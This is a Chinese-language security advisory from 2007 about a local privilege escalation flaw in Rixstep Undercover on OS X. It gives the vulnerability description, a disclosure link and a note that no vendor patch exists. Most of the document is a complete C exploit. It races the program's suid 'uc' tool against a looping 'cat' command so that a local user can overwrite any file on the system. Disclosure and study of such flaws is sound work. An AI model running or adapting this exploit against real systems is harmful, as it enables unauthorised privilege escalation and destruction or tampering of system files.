Rixstep Undercover本地权限提升漏洞
发布日期:2007-01-15
更新日期:2007-01-18
受影响系统:Rixstep Undercover
描述:
BUGTRAQ ID:
22071
Undercover允许用户查看OS X系统中的隐藏文件。
Undercover的实现上存在漏洞,本地攻击者可能利用此漏洞重写系统上的任意文件,可能导致用户权限提升。
<*来源:Rixstep Pwned (
rixstep.pwned@gmail.com)
链接:
http://lists.grok.org.uk/pipermail/full-disclosure/2007-January/051793.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
* "It may not come as a shocker, but so far the Month of Rixstep Bugs has not netted a single bug."
* --
http://rixstep.com/1/20070115,00.shtml
*
* Maybe because nobody was looking?
* Here's a nice little exploit to overwrite any file on the system courtesy of
* Rixstep.
*
* Just run Undercover <
ftp://rixstep.com/pub/Undercover.tar.bz2> once as an
* administrator to create that nice little suid-tool.
* Then run this app giving the path to the uc tool (Undercover.app/Contents/Resources/uc)
* a file you want to overwrite, and the file the data to overwrite with is
* located at.
*
* The pwnies aren't just for everyone else Rixstep.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main (int argc, char *argv[])
{
pid_t pid;
char *overwrite_cmd, *uc_cmd;
if(argc != 4) {
fprintf(stderr, "rixstep_pwnage.c\n");
fprintf(stderr, "Usage: %s <uc tool path> <file to overwrite> <source file>\n", argv[0]);
return 1;
}
asprintf(&overwrite_cmd, "/bin/cat %s > %s", argv[3], argv[2]);
asprintf(&uc_cmd, "%s + %s", argv[1], argv[2]);
pid = fork();
if(pid == 0)
{
for (;;) {
system(overwrite_cmd);
}
}
if(pid > 0)
{
for (;;) {
system(uc_cmd);
}
}
}
建议:
厂商补丁:
Rixstep
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://rixstep.com/4/0/undercover/浏览次数:2651
严重程度:0(网友投票)
